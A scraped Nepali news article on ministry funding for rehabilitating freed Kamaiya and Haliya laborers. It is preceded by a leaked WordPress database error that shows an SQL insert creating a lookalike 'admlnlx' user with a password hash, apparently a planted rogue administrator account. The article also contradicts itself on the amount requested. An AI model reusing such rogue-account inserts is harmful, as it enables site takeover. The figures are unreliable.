WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BukGq7Xx5Yb.rBpQJ20omyyI2.tWf30', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:16:17', '', 'admlnlx', 'admlnlx')
काठमाडौं,फागुन ५ –
भूमिसुधार तथा व्यवस्था मन्त्रालयले मुक्त कमैया तथा हलियाहरुको पुनर्स्थापनाका लागि थप १ अर्ब ३० करोड रुपैयाँ माग गरेको छ। सुदूर तथा मध्य पश्चिमका १२ जिल्लाका मुक्त हलिया र ५ जिल्लाका मुक्त कमैयाको पुनर्स्थस्पथापनाका लागि थप १ सय ३० अर्ब रुपैयाँ आवश्यक पर्ने भन्दै मन्त्रालयले अर्थ मन्त्रालयसँग छलफल सुरु गरेको छ।
‘१२ जिल्लाका मुक्त हलिया र ५ जिल्लाका मुक्त कमैयाको पुनस्थपनाको लागि चालु आर्थिक वर्षमा आवश्य अपुग रकम निकास गर्न अर्थ मन्त्रालयसँग छलफल सुरु गरिएको छ’ भूमिसुधार तथा व्यवस्था मन्त्री विक्रम पाण्डेले विहीबार मन्त्रालयमा आयोजित पत्रकार सम्मेलनमा भने ‘रकम निकास भए छिट्टै १६ वर्ष देखिको यो समस्या समधान हुनेछ।’ मन्त्रालयले चालु आर्थिक वर्षमा मुक्त कमैया र हलियाको पुनर्स्थापनाका लागि १ अर्ब १० करोड रुपैयाँ सम्वन्धित जिल्लामा निकासा गरिसकेको छ। उसले कमैया र हलियाको पुनर्स्थापना गरिसक्न थप रकम माग गरेको हो।
हुम्लाको मुक्त हलियाको पुनरस्थपना यसै आर्थिक वर्ष भित्र गरिसक्ने भूमिसुधार मन्त्रालयको लक्ष्य रहेको छ। हुम्लामा अहिले सम्म १८ करोड रुपैयाँ निकासा गरिएको छ। त्यस्तै आगामी दुई वर्ष भित्र देशै भरको मुक्त कमैया तथा हलियालाई पुनर्स्थापना गर्ने लक्ष भूमिसुधार मन्त्रालयको रहेको छ। मन्त्री पाण्डेले आफ्नो मन्त्रालय अन्तर्गतको रकम फ्रिज हुन नदिने प्रतिवद्धता समेत जनाएका छन्।